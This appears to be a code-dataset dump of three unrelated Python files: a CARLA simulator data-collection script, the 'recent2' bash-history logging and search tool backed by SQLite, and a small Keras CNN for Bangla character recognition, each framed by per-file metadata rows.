| 28.087719 | 91 | 0.610868 | 175 | 1,601 | 5.297143 | 0.348571 | 0.064725 | 0.06041 | 0.084142 | 0.228695 | 0.228695 | 0.148867 | 0 | 0 | 0 | 0 | 0.0045 | 0.306059 | 1,601 | 56 | 92 | 28.589286 | 0.829883 | 0.049344 | 0 | 0.186047 | 0 | 0 | 0.00527 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116279 | false | 0 | 0.116279 | 0 | 0.255814 | 0.023256 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378b8c1c8a129943980f58b79ee2233ffe6b0bae | 3,439 | py | Python | haco/DIDrive_core/demo/latent_rl/collect_data.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | 21 | 2022-02-15T10:11:54.000Z | 2022-03-24T17:44:29.000Z | haco/DIDrive_core/demo/latent_rl/collect_data.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | null | null | null | haco/DIDrive_core/demo/latent_rl/collect_data.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | 3 | 2022-02-22T11:11:43.000Z | 2022-03-17T17:58:44.000Z | import os
from functools import partial

import numpy as np
from ding.envs import SyncSubprocessEnvManager
from ding.utils.default_helper import deep_merge_dicts
from easydict import EasyDict
from tqdm import tqdm

from haco.DIDrive_core.data import CarlaBenchmarkCollector, BenchmarkDatasetSaver
from haco.DIDrive_core.envs import SimpleCarlaEnv, CarlaEnvWrapper
from haco.DIDrive_core.policy import AutoPIDPolicy
from haco.DIDrive_core.utils.others.tcp_helper import parse_carla_tcp

config = dict(
    env=dict(
        env_num=5,
        simulator=dict(
            disable_two_wheels=True,
            planner=dict(
                type='behavior',
                resolution=1,
            ),
            obs=(
                dict(
                    name='birdview',
                    type='bev',
                    size=[320, 320],
                    pixels_per_meter=5,
                    pixels_ahead_vehicle=100,
                ),
            ),
            verbose=False,
        ),
        col_is_failure=True,
        stuck_is_failure=True,
        wrapper=dict(),
        manager=dict(
            auto_reset=False,
            shared_memory=False,
            context='spawn',
            max_retry=1,
        ),
    ),
    server=[
        dict(carla_host='localhost', carla_ports=[9000, 9010, 2]),
    ],
    policy=dict(
        target_speed=25,
        noise=False,
        collect=dict(
            dir_path='bev_train',
            n_episode=50,
            collector=dict(
                suite=['NoCrashTown01-v3', 'NoCrashTown01-v5'],
                nocrash=True,
                weathers=[1],
            ),
        ),
    ),
)
main_config = EasyDict(config)


def latent_postprocess(observations, *args):
    sensor_data = {}
    sensor_data['birdview'] = observations['birdview'][..., :7]
    others = {}
    return sensor_data, others


def wrapped_env(env_cfg, wrapper_cfg, host, port, tm_port=None):
    return CarlaEnvWrapper(SimpleCarlaEnv(env_cfg, host, port, tm_port), wrapper_cfg)


def main(cfg, seed=0):
    cfg.env.manager = deep_merge_dicts(SyncSubprocessEnvManager.default_config(), cfg.env.manager)

    tcp_list = parse_carla_tcp(cfg.server)
    env_num = cfg.env.env_num

    collector_env = SyncSubprocessEnvManager(
        env_fn=[partial(wrapped_env, cfg.env, cfg.env.wrapper, *tcp_list[i]) for i in range(env_num)],
        cfg=cfg.env.manager,
    )
    collector_env.seed(seed)

    policy = AutoPIDPolicy(cfg.policy)
    collector = CarlaBenchmarkCollector(cfg.policy.collect.collector, collector_env, policy.collect_mode)

    if not os.path.exists(cfg.policy.collect.dir_path):
        os.makedirs(cfg.policy.collect.dir_path)

    collected_episodes = 0
    saver = BenchmarkDatasetSaver(cfg.policy.collect.dir_path, cfg.env.simulator.obs, latent_postprocess)
    saver.make_dataset_path(cfg.policy.collect)
    while collected_episodes < cfg.policy.collect.n_episode:
        # Sampling data from environments
        n_episode = min(cfg.policy.collect.n_episode - collected_episodes, env_num * 2)
        new_data = collector.collect(n_episode=n_episode)
        saver.save_episodes_data(new_data, start_episode=collected_episodes)
        del new_data
        collected_episodes += n_episode
        print('[MAIN] Current collected: ', collected_episodes, '/', cfg.policy.collect.n_episode)
    collector_env.close()


if __name__ == '__main__':
    main(main_config)
| 30.433628 | 105 | 0.639139 | 396 | 3,439 | 5.310606 | 0.363636 | 0.038516 | 0.060865 | 0.036139 | 0.099382 | 0.038992 | 0.038992 | 0 | 0 | 0 | 0 | 0.014596 | 0.262867 | 3,439 | 112 | 106 | 30.705357 | 0.81499 | 0.009014 | 0 | 0.097826 | 0 | 0 | 0.036994 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032609 | false | 0 | 0.119565 | 0.01087 | 0.173913 | 0.01087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378fb80fb53ae0d7cd227f1351a2926e938d591b | 25,206 | py | Python | recent2.py | hongyi-zhao/recent2 | 5b072ff5d6419c444bb013b88e5e2a4de19b0851 | [
"MIT"
] | null | null | null | recent2.py | hongyi-zhao/recent2 | 5b072ff5d6419c444bb013b88e5e2a4de19b0851 | [
"MIT"
] | null | null | null | recent2.py | hongyi-zhao/recent2 | 5b072ff5d6419c444bb013b88e5e2a4de19b0851 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# https://github.com/kislyuk/argcomplete#synopsis
import argcomplete
import argparse
import hashlib
import json
import os
import re
import socket
import sqlite3
import sys
import time
from pathlib import Path

from tabulate import tabulate
from datetime import datetime
# pip install python-dateutil
from dateutil import tz

recent_db = os.getenv('RECENT_DB', os.environ['HOME'] + '/.recent.db')
EXPECTED_PROMPT = 'log-recent -r $__bp_last_ret_value -c "$(HISTTIMEFORMAT= history 1)" -p $$'


class Term:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    LIGHTCYAN = '\033[1;36m'
    LIGHTGRAY = '\033[0;37m'
    YELLOW = '\033[0;33m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


class DB:
    SCHEMA_VERSION = 2
    CASE_ON = "PRAGMA case_sensitive_like = true"
    GET_COMMANDS_TABLE_SCHEMA = """
        select sql
        from sqlite_master
        where type = 'table' and name = 'commands'"""
    # NOTE(dotslash): I haven't found a way to send json using ?s. So doing it with string formats.
    INSERT_ROW = """
        insert into commands
        (command_dt,command,pid,return_val,pwd,session,json_data)
        values (
            datetime(?, 'unixepoch'), -- command_dt
            ?,  -- command
            ?,  -- pid
            ?,  -- return_val
            ?,  -- pwd
            ?,  -- session
            {}  -- json_data
        )"""
    INSERT_ROW_NO_JSON = """
        insert into commands
        (command_dt,command,pid,return_val,pwd,session,json_data)
        values (
            datetime(?, 'unixepoch'), -- command_dt
            ?,    -- command
            ?,    -- pid
            ?,    -- return_val
            ?,    -- pwd
            ?,    -- session
            null  -- json_data
        )"""
    INSERT_SESSION = """
        insert into sessions
        (created_dt, updated_dt, term, hostname, user, sequence, session)
        values (
            datetime('now','localtime'), datetime('now','localtime'), -- created_dt, updated_dt
            ?,  -- term
            ?,  -- hostname
            ?,  -- user
            ?,  -- sequence
            ?   -- session
        )"""
    UPDATE_SESSION = """
        update sessions
        set updated_dt = datetime('now','localtime'), sequence = ?
        where session = ?"""
    # TAIL_N_ROWS's columns (column order is the same as in TAIL_N_ROWS)
    TAIL_N_ROWS_COLUMNS = 'command_dt,command,pid,return_val,pwd,session,json_data'.split(',')
    TAIL_N_ROWS_DEDUP_COLUMNS = 'command_dt,command'.split(',')
    TAIL_N_ROWS_TEMPLATE = """
        select command_dt,command,pid,return_val,pwd,session,json_data
        from (
            select *
            from commands
            where
            order by command_dt desc limit ?
        )
        order by command_dt"""
    TAIL_N_ROWS_TEMPLATE_DEDUP = """
        select *
        from (
            select max(command_dt) as command_dt, command
            from commands
            where
            group by command
            order by command_dt desc limit ?
        )
        order by command_dt"""
    GET_SESSION_SEQUENCE = """select sequence from sessions where session = ?"""
    # Setup: Create tables.
    CREATE_COMMANDS_TABLE = """
        create table if not exists commands (
            command_dt timestamp,
            command text,
            pid int,
            return_val int,
            pwd text,
            session text,
            json_data json
        )"""
    CREATE_SESSIONS_TABLE = """
        create table if not exists sessions (
            session text primary key not null,
            created_dt timestamp,
            updated_dt timestamp,
            term text,
            hostname text,
            user text,
            sequence int
        )"""
    CREATE_DATE_INDEX = """
        create index if not exists command_dt_ind
        on commands (command_dt)"""
    # Schema version
    GET_SCHEMA_VERSION = """pragma user_version"""
    UPDATE_SCHEMA_VERSION = """pragma user_version = """
    # Migrate from v1 to v2.
    MIGRATE_1_2 = "alter table commands add column json_data json"


class Session:
    @classmethod
    def session_id_string(cls, pid=None):
        # TODO(sai): Should this always be ppid?
        pid = pid or os.getppid()
        # This combination of ENV vars *should* provide a unique session
        # TERM_SESSION_ID for OS X Terminal
        # XTERM for xterm
        # TMUX, TMUX_PANE for tmux
        # STY for GNU screen
        # SHLVL handles nested shells
        seed = "{}-{}-{}-{}-{}-{}-{}".format(
            os.getenv('TERM_SESSION_ID', ''),
            os.getenv('WINDOWID', ''),
            os.getenv('SHLVL', ''),
            os.getenv('TMUX', ''),
            os.getenv('TMUX_PANE', ''),
            os.getenv('STY', ''),
            pid,
        )  # yapf: disable
        return hashlib.md5(seed.encode('utf-8')).hexdigest()

    def __init__(self, pid, sequence):
        self.sequence = sequence
        self.empty = False
        self.id = Session.session_id_string(pid)

    def update(self, conn):
        c = conn.cursor()
        try:
            term = os.getenv('TERM', '')
            hostname = socket.gethostname()
            user = os.getenv('USER', '')
            c.execute(DB.INSERT_SESSION, [term, hostname, user, self.sequence, self.id])
            self.empty = True
        except sqlite3.IntegrityError:
            # Carriage returns need to be ignored
            expected_sequence = c.execute(DB.GET_SESSION_SEQUENCE, [self.id]).fetchone()[0]
            if expected_sequence == int(self.sequence):
                self.empty = True
            c.execute(DB.UPDATE_SESSION, [self.sequence, self.id])
        c.close()


def migrate(cur_version, conn):
    if cur_version not in (0, 1):
        exit(Term.FAIL + ('recent: your command history database does not '
                          'match recent, please update') + Term.ENDC)
    c = conn.cursor()
    if cur_version == 1:
        # Schema version is v1. Migrate to v2.
        print(Term.WARNING + 'recent: migrating schema to version {}'.format(DB.SCHEMA_VERSION) +
              Term.ENDC)
        c.execute(DB.MIGRATE_1_2)
    else:
        print(Term.WARNING + 'recent: building schema' + Term.ENDC)
        c.execute(DB.CREATE_COMMANDS_TABLE)
        c.execute(DB.CREATE_SESSIONS_TABLE)
        c.execute(DB.CREATE_DATE_INDEX)
    c.execute(DB.UPDATE_SCHEMA_VERSION + str(DB.SCHEMA_VERSION))
    conn.commit()


# Parses the history command output.
# This parses the output of `HISTTIMEFORMAT= history 1`
# Format: optional_whitespace + required_sequence_number + required_whitespace + command
def parse_history(history):
    match = re.search(r'^\s*(\d+)\s+(.*)$', history, re.MULTILINE | re.DOTALL)
    if match:
        sequence, cmd = int(match.group(1)), match.group(2)
        # The log command discards a suffix like "my_cmd <ts>" on the command being
        # logged. If a user copy-pastes recent output, having this timestamp would look weird.
        copied_from_recent = \
            re.search(r'^(.*)\s+\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$', cmd)
        if copied_from_recent:
            cmd = copied_from_recent.group(1)
        return sequence, cmd
    else:
        return None, None
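

# Illustrative sketch (not part of the original module): what parse_history
# accepts and returns. The history lines below are hypothetical:
#
#   parse_history('  501  git status')               # -> (501, 'git status')
#   parse_history('  502  ls 2021-05-01 10:00:00')   # timestamp suffix stripped
#   # -> (502, 'ls')
#   parse_history('garbage')                         # -> (None, None)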
def parse_date(date_format):
    if re.match(r'^\d{4}$', date_format):
        return 'strftime(\'%Y\', command_dt) = ?'
    if re.match(r'^\d{4}-\d{2}$', date_format):
        return 'strftime(\'%Y-%m\', command_dt) = ?'
    if re.match(r'^\d{4}-\d{2}-\d{2}$', date_format):
        return 'date(command_dt) = ?'
    else:
        print("Invalid date passed to -D")
        sys.exit(1)


def create_connection():
    conn = sqlite3.connect(recent_db, uri=recent_db.startswith("file:"))
    build_schema(conn)
    return conn


def build_schema(conn):
    try:
        c = conn.cursor()
        current = c.execute(DB.GET_SCHEMA_VERSION).fetchone()[0]
        if current != DB.SCHEMA_VERSION:
            migrate(current, conn)
    except (sqlite3.OperationalError, TypeError):
        migrate(0, conn)


def envvars_to_log():
    envvar_whitelist = {k.strip() for k in os.getenv('RECENT_ENV_VARS', '').split(',') if k.strip()}

    def is_var_interesting(name: str):
        # Anything starting with RECENT_ is welcome.
        if name.startswith("RECENT_"):
            return True
        for interesting_var in envvar_whitelist:
            # if name matches glob(interesting_var) then we will store it.
            # E.g. CONDA_* => we are interested in all env vars that start with CONDA_.
            if Path(name).match(interesting_var):
                return True
        return False

    return {k: v for k, v in os.environ.items() if is_var_interesting(k)}
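

# Illustrative sketch (not part of the original module): with the hypothetical
# setting RECENT_ENV_VARS="CONDA_*,VIRTUAL_ENV", this function captures e.g.
# CONDA_DEFAULT_ENV and VIRTUAL_ENV, plus anything starting with RECENT_, and
# log_command() stores them in the json_data column of each row:
#
#   os.environ['RECENT_ENV_VARS'] = 'CONDA_*,VIRTUAL_ENV'
#   os.environ['CONDA_DEFAULT_ENV'] = 'base'
#   envvars_to_log()   # -> {'CONDA_DEFAULT_ENV': 'base', ...}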
# Entry point to the recent-log command.
def log(args_for_test=None):
    parser = argparse.ArgumentParser()
    parser.add_argument('-r',
                        '--return_value',
                        help='Command return value. Set to $?',
                        default=0,
                        type=int)
    parser.add_argument('-c', '--command', help='Set to $(HISTTIMEFORMAT= history 1)', default='')
    parser.add_argument('-p', '--pid', help='Shell pid. Set to $$', default=0, type=int)
    args = parser.parse_args(args_for_test)
    sequence, command = parse_history(args.command)
    pid, return_value = args.pid, args.return_value
    pwd = os.getenv('PWD', '')
    if not sequence or not command:
        print(Term.WARNING + ('recent: cannot parse command output, please check your bash '
                              'trigger looks like this:') + Term.ENDC)
        exit("""export PROMPT_COMMAND='{}'""".format(EXPECTED_PROMPT))
    log_command(command=command, pid=pid, sequence=sequence, return_value=return_value, pwd=pwd)


def log_command(command, pid, sequence, return_value, pwd):
    conn = create_connection()
    session = Session(pid, sequence)
    session.update(conn)
    if not session.empty:
        c = conn.cursor()
        json_data = "json('{}')".format(json.dumps({'env': envvars_to_log()}))
        # We pass the current time instead of using 'now' in sql so this value can be mocked.
        c.execute(DB.INSERT_ROW.format(json_data),
                  [int(time.time()), command, pid, return_value, pwd, session.id])
        conn.commit()
    conn.close()


# Imports bash_history into RECENT_DB.
# Entry point to the recent-import-bash-history command.
def import_bash_history_entry_point(args_for_test=None):
    description = ('recent-import-bash-history imports bash_history into ~/.recent.db. '
                   'Run `recent -h` for info about the recent command.')
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument('-f',
                        help='Force import bash history ignoring previous imports',
                        action='store_true')
    args = parser.parse_args(args_for_test)
    import_marker = Path(
        os.environ.get("RECENT_TEST_IMPORT_FILE", "~/.recent_imported_bash_history"))
    import_marker = import_marker.expanduser().absolute()
    print(import_marker)
    if not args.f and import_marker.exists():
        print(Term.FAIL +
              'recent-import-bash-history failed: Bash history already imported into ~/.recent.db')
        print('Run the command with the -f option if you are absolutely sure.' + Term.ENDC)
        parser.print_help()
        sys.exit(1)
    import_bash_history()
    import_marker.touch()


def import_bash_history():
    # Construct history from bash_history.
    # Example bash_history. The history has 3 entries. The first entry has no timestamp
    # attached to it. The next 2 entries have timestamps attached to them. The last entry
    # has some unknown comment which we will ignore.
    """
    ls /
    #1571012545
    echo foo
    #1571012560
    #useless comment that should be ignored.
    cat bar
    """
    history = []
    # Phase 1 starts: After this phase history will be like this
    # [(-1, "ls /"),  # This entry has no timestamp.
    #  (1571012545, "echo foo"),
    #  (1571012560, "cat bar")]
    last_ts = -1
    histfile = Path(os.environ.get("HISTFILE", "~/.bash_history")).expanduser()
    if not histfile.exists():
        return
    for line in histfile.read_text().splitlines():
        if not line:
            continue
        if line[0] == '#':
            try:
                last_ts = int(line[1:].strip())
            except Exception:
                # Ignore the exception.
                pass
            continue
        history.append([last_ts, line.strip()])
    # Phase 2 starts: After this phase history will be like this
    # [(1571012545, "ls /"),  # Timestamp for this comes from its next entry
    #  (1571012545, "echo foo"),
    #  (1571012560, "cat bar")]
    last_ts = -1
    for i in range(len(history) - 1, -1, -1):
        if history[i][0] == -1 and last_ts != -1:
            history[i][0] = last_ts
        elif history[i][0] != -1 and last_ts == -1:
            last_ts = history[i][0]
    # Add the history entries into recent's DB.
    conn = create_connection()
    import random
    # Create a session with a random -ve pid and random -ve sequence id.
    pid = -random.randint(1, 10000000)
    session = Session(pid=pid, sequence=-random.randint(1, 10000000))
    session.update(conn)
    for cmd_ts, cmd in history:
        c = conn.cursor()
        c.execute(DB.INSERT_ROW_NO_JSON, [
            cmd_ts, cmd, pid,
            # exit status=-1, working directory=/unknown
            -1, "/unknown", session.id])  # yapf: disable
    conn.commit()
    conn.close()


# Returns a list of queries to run for the given args.
# Return type: List(Pair(query, List(query_string)))
def query_builder(args):
    # TODO
    # https://docs.python.org/3/library/argparse.html#mutual-exclusion
    if args.r and args.s:
        sys.exit(Term.FAIL + 'Only one of -re and -sql should be set' + Term.ENDC)
    sum_status = sum(1 for x in [args.failure, args.code != -1] if x)
    if sum_status > 1:
        sys.exit(Term.FAIL + 'Only one of --failure and --code has to be set' + Term.ENDC)
    query = DB.TAIL_N_ROWS_TEMPLATE_DEDUP if args.dedup else DB.TAIL_N_ROWS_TEMPLATE
    filters = []
    parameters = []
    if args.session:
        filters.append('session = ?')
        parameters.append(Session.session_id_string())
    if args.failure:
        # https://stackoverflow.com/questions/16749121/what-does-mean-in-python
        filters.append('return_val != 0')
    if args.code != -1:
        filters.append('return_val == ?')
        parameters.append(args.code)
    if not args.self:
        # Don't return recent commands unless the user asks for them.
        filters.append("""command not like 'recent%'""")
    if args.pattern:
        if args.r:
            filters.append('command REGEXP ?')
            parameters.append(args.pattern)
        elif args.s:
            filters.append(args.pattern)
        else:
            filters.append('command like ?')
            parameters.append('%' + args.pattern + '%')
    if args.d:
        filters.append('pwd = ?')
        parameters.append(str(Path(args.d).expanduser().absolute()))
    if args.D:
        filters.append(parse_date(args.D))
        parameters.append(args.D)
    for env_var in args.env:
        split = env_var.split(":")
        if len(split) == 1:
            filters.append('json_extract(json_data, "$.env.{}") is not null'.format(split[0]))
        else:
            filters.append('json_extract(json_data, "$.env.{}") = ?'.format(split[0]))
            parameters.append(split[1])
    filters.append('length(command) <= {}'.format(args.limit))
    try:
        n = int(args.n)
        parameters.append(n)
    except ValueError:
        exit(Term.FAIL + '-n must be an integer' + Term.ENDC)
    where = 'where ' + ' and '.join(filters) if len(filters) > 0 else ''
    ret = []
    if not args.insensitive:
        # No params required for the case-sensitivity pragma.
        ret.append((DB.CASE_ON, []))
    query_and_params = query.replace('where', where), parameters
    ret.append(query_and_params)
    return ret


# Returns true if `item` matches `expr`. Used as a sqlite UDF.
def regexp(expr, item):
    reg = re.compile(expr)
    return reg.search(item) is not None


def make_arg_parser_for_recent():
    description = ('recent is a convenient way to query bash history. '
                   'Visit {} for more examples or to ask questions or to report issues'
                   ).format(Term.UNDERLINE + 'https://github.com/dotslash/recent2' + Term.ENDC)
    epilog = 'To import bash history into the recent db run {}'.format(Term.UNDERLINE +
                                                                       'recent-import-bash-history' +
                                                                       Term.ENDC)
    parser = argparse.ArgumentParser(description=description, epilog=epilog)
    parser.add_argument('pattern',
                        nargs='?',
                        default='',
                        help='optional pattern to search')
    parser.add_argument('-n',
                        metavar='NUM',
                        help='max results to return',
                        default=20)
    # Filters for command success/failure.
    parser.add_argument('-e',
                        '--code',
                        metavar='CODE',
                        help='int exit status of the commands to return. -1 => return all.',
                        default=-1)
    parser.add_argument('-f',
                        '--failure',
                        help='only return commands that exited with failure',
                        action='store_true')
    # Other filters/options.
    parser.add_argument('-d',
                        metavar='DIR',
                        help='the directory where the command was run',
                        default='')
    parser.add_argument('-N',
                        '--session',
                        help='returns commands only from the current session',
                        action='store_true')
    parser.add_argument('-D',
                        metavar='DATE',
                        help='date in YYYY, YYYY-MM, or YYYY-MM-DD formats',
                        default='')
    parser.add_argument('-S',
                        '--self',
                        help='return `recent` commands also in the output',
                        action='store_true')
    parser.add_argument('-L',
                        '--limit',
                        help='ignore commands longer than this',
                        default=400)
    parser.add_argument('-E',
                        '--env',
                        action='append',
                        help=('Filter by shell env vars. Env vars set in RECENT_ENV_VARS '
                              'as a comma separated list will be captured.'),
                        metavar='key[:val]',
                        default=[])
    parser.add_argument('-p',
                        '--dedup',
                        action='store_true',
                        help='deduplication')
    # CONTROL OUTPUT FORMAT
    # Hide time. This makes copy-pasting simpler.
    parser.add_argument('-t',
                        '--time',
                        help='displays the local time converted from UTC',
                        action='store_true')
    parser.add_argument('-g',
                        '--debug',
                        help='debug mode',
                        action='store_true')
    parser.add_argument('-l',
                        '--detail',
                        help='return detailed output',
                        action='store_true')
    parser.add_argument(
        '-c',
        '--columns',
        metavar='COL',
        help=('Comma separated columns to print if --detail is passed. Valid columns are '
              'command_dt,command,pid,return_val,pwd,session,json_data'),
        default="command_dt,command,json_data")
    # Query type - regex/sql.
    parser.add_argument('-r',
                        help='enable regex search pattern',
                        action='store_true')
    parser.add_argument('-s',
                        help='enable sqlite search pattern',
                        action='store_true')
    parser.add_argument('-i',
                        '--insensitive',
                        help='ignore case distinctions in patterns and data',
                        action='store_true')
    # https://github.com/awaxa/recent2/commit/eeead062675b89489674654e4b5c8def467a2e08
    argcomplete.autocomplete(parser)
    return parser


def check_prompt(debug):
    if os.environ.get('RECENT_CUSTOM_PROMPT'):
        if debug:
            print("RECENT_CUSTOM_PROMPT is set. Not checking prompt")
        return
    actual_prompt = os.environ.get('PROMPT_COMMAND', '')
    export_prompt_cmd = '''export PROMPT_COMMAND='{}' '''.format(EXPECTED_PROMPT)
    if EXPECTED_PROMPT not in actual_prompt:
        print(Term.BOLD + "PROMPT_COMMAND env variable is not set. " +
              "Add the following line to .bashrc or .bash_profile" + Term.ENDC)
        sys.exit(Term.UNDERLINE + export_prompt_cmd + Term.ENDC)


def tty_width():
    import shutil
    sz = shutil.get_terminal_size(fallback=(0, 0))
    return sz.columns


def pad(raw_text, print_text):
    allowed_width = min(tty_width() - 30, 50)
    to_pad = max(allowed_width - len(raw_text), 0)
    return print_text + (' ' * to_pad)


def handle_recent_command(args):
    check_prompt(args.debug)  # Fail the command if PROMPT_COMMAND is not set
    conn = create_connection()
    # Install the REGEXP sqlite UDF.
    conn.create_function("REGEXP", 2, regexp)
    # Register the queries executed. (Replace new lines with spaces in the query)
    queries_executed = []

    def update_queries_executed(inp):
        if inp == DB.GET_COMMANDS_TABLE_SCHEMA:
            return
        trans = inp.replace('\n', ' ')
        queries_executed.append(trans)

    conn.set_trace_callback(update_queries_executed)
    c = conn.cursor()
    detail_results = []
    columns_to_print = set(args.columns.split(','))
    columns_to_print.update(['command_dt', 'command', 'return_val'])
    for query, parameters in query_builder(args):
        for row in c.execute(query, parameters):
            query_columns = DB.TAIL_N_ROWS_DEDUP_COLUMNS if args.dedup else DB.TAIL_N_ROWS_COLUMNS
            row_dict = {
                query_columns[i]: row[i]
                for i in range(len(row))
                if query_columns[i] in columns_to_print
            }
            if 'command_dt' not in row_dict or 'command' not in row_dict:
                # Rows without a timestamp or a command are not printable.
                continue
            if args.detail:
                detail_results.append(row_dict)
                continue
            colored_cmd = row_dict['command']
            if row_dict.get('return_val', 0) > 0:
                # Show failed commands in red. We check > 0 because for commands
                # imported via import_bash_history the return_val is negative.
                colored_cmd = Term.FAIL + colored_cmd + Term.ENDC
            if args.time:
                # https://www.sqlite.org/lang_datefunc.html
                # https://groups.google.com/g/comp.lang.python/c/PhtX3V0jsSA/m/7cSdd0y7BQAJ
                # https://stackoverflow.com/questions/4770297/convert-utc-datetime-string-to-local-datetime
                from_zone = tz.tzutc()
                to_zone = tz.tzlocal()
                cmd_time = datetime.strptime(
                    row_dict["command_dt"], '%Y-%m-%d %H:%M:%S').replace(
                        tzinfo=from_zone).astimezone(to_zone).strftime("%Y-%m-%d %H:%M:%S")
                print(f'{Term.YELLOW}{cmd_time}{Term.ENDC} {colored_cmd}')
            else:
                print(colored_cmd)
    if args.detail:
        if 'json_data' not in columns_to_print:
            print(tabulate(detail_results, headers="keys"))
        else:
            for res in detail_results:
                for k, v in res.items():
                    print(Term.BOLD + Term.OKBLUE + k + Term.ENDC + ": " + str(v))
                print("---------------------------------")
    if args.debug:
        schema = None
        for row in c.execute(DB.GET_COMMANDS_TABLE_SCHEMA, []):
            schema = row[0]
        print("=========DEBUG=========")
        print("---SCHEMA---")
        print(schema)
        print("---QUERIES---")
        print("To reproduce this output run the following sqlite command")
        print("""sqlite3 {} "{}" """.format(recent_db, '; '.join(queries_executed)))
    conn.close()


def main():
    parser = make_arg_parser_for_recent()
    args = parser.parse_args()
    handle_recent_command(args)


if __name__ == '__main__':
    print("=================")
    print("Executing recent from __main__.")
    print("This means recent2 is being run via `python recent2.py`")
    print("=================")
    main()
| 37.620896 | 165 | 0.568119 | 2,986 | 25,206 | 4.649364 | 0.188881 | 0.015559 | 0.026939 | 0.00958 | 0.173522 | 0.116473 | 0.091047 | 0.070302 | 0.056472 | 0.037744 | 0 | 0.016633 | 0.31068 | 25,206 | 669 | 166 | 37.67713 | 0.782388 | 0.131318 | 0 | 0.195817 | 0 | 0.001901 | 0.284954 | 0.031396 | 0.001901 | 0 | 0 | 0.00299 | 0 | 1 | 0.043726 | false | 0.005703 | 0.057034 | 0 | 0.197719 | 0.060837 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3791e586a9b8f892c8036023d9ce18df5f8e863a | 2,499 | py | Python | cnn_model.py | Onimee58/bangla_ocr_cnn | c274d05adbbf2381d0d467ee7fad57fd89bc4019 | [
"MIT"
] | null | null | null | cnn_model.py | Onimee58/bangla_ocr_cnn | c274d05adbbf2381d0d467ee7fad57fd89bc4019 | [
"MIT"
] | null | null | null | cnn_model.py | Onimee58/bangla_ocr_cnn | c274d05adbbf2381d0d467ee7fad57fd89bc4019 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon May 10 04:24:41 2021
@author: Saif
"""
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D
from keras.layers import Dropout, Flatten, Dense
from keras.preprocessing import image
from keras.preprocessing.image import img_to_array, load_img
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
def cnn_model(train_tensors):
model = Sequential()
# First Convolution Layer with Pooling
model.add(Conv2D(filters=16, kernel_size=2, padding='valid', activation='relu', input_shape=(train_tensors.shape[1:])))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.2))
# Adding a second convolutional layer with Pooling
model.add(Conv2D(filters=32, kernel_size=2, padding='valid', activation='relu'))
model.add(MaxPooling2D(pool_size =2))
model.add(Dropout(0.2))
# Adding a third convolutional layer with Pooling
model.add(Conv2D(filters=64, kernel_size=2, padding='valid', activation='relu'))
model.add(MaxPooling2D(pool_size =2))
model.add(Dropout(0.2))
# Adding a fourth convolutional layer with Pooling
model.add(Conv2D(filters=128, kernel_size=2, padding='valid', activation='relu'))
model.add(MaxPooling2D(pool_size =2))
model.add(Dropout(0.2))
# Adding a fifth convolutional layer with Pooling
model.add(Conv2D(filters=256, kernel_size=2, padding='valid', activation='relu'))
model.add(MaxPooling2D(pool_size =2))
model.add(Dropout(0.2))
#model.add(GlobalAveragePooling2D())
model.add(Flatten())
# Full connection Dense Layers
model.add(Dense(256, activation='relu'))
#model.add(Dropout(0.2))
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.2))
model.add(Dense(50, activation = 'softmax'))
model.summary()
return model
def path_to_tensor(img_path):
# loads RGB image as PIL.Image.Image type
img = load_img(img_path, target_size=(64, 64), grayscale=True)
# convert PIL.Image.Image type to 3D tensor with shape (64, 64, 3)
x = img_to_array(img)
# convert 3D tensor to 4D tensor with shape (1, 64, 64, 3) and return 4D tensor
return np.expand_dims(x, axis=0)
if __name__ == "__main__":
cnn_model(path_to_tensor('trial/ka.jpg'))
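

# Illustrative sketch (not part of the original module): compiling and
# training the model above on a stacked set of image tensors. The image
# paths, label array and hyperparameters here are hypothetical placeholders.
#
#   train_tensors = np.vstack([path_to_tensor(p) for p in image_paths]) / 255.0
#   model = cnn_model(train_tensors)
#   model.compile(optimizer='rmsprop', loss='categorical_crossentropy',
#                 metrics=['accuracy'])
#   model.fit(train_tensors, one_hot_labels, epochs=10, batch_size=32)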
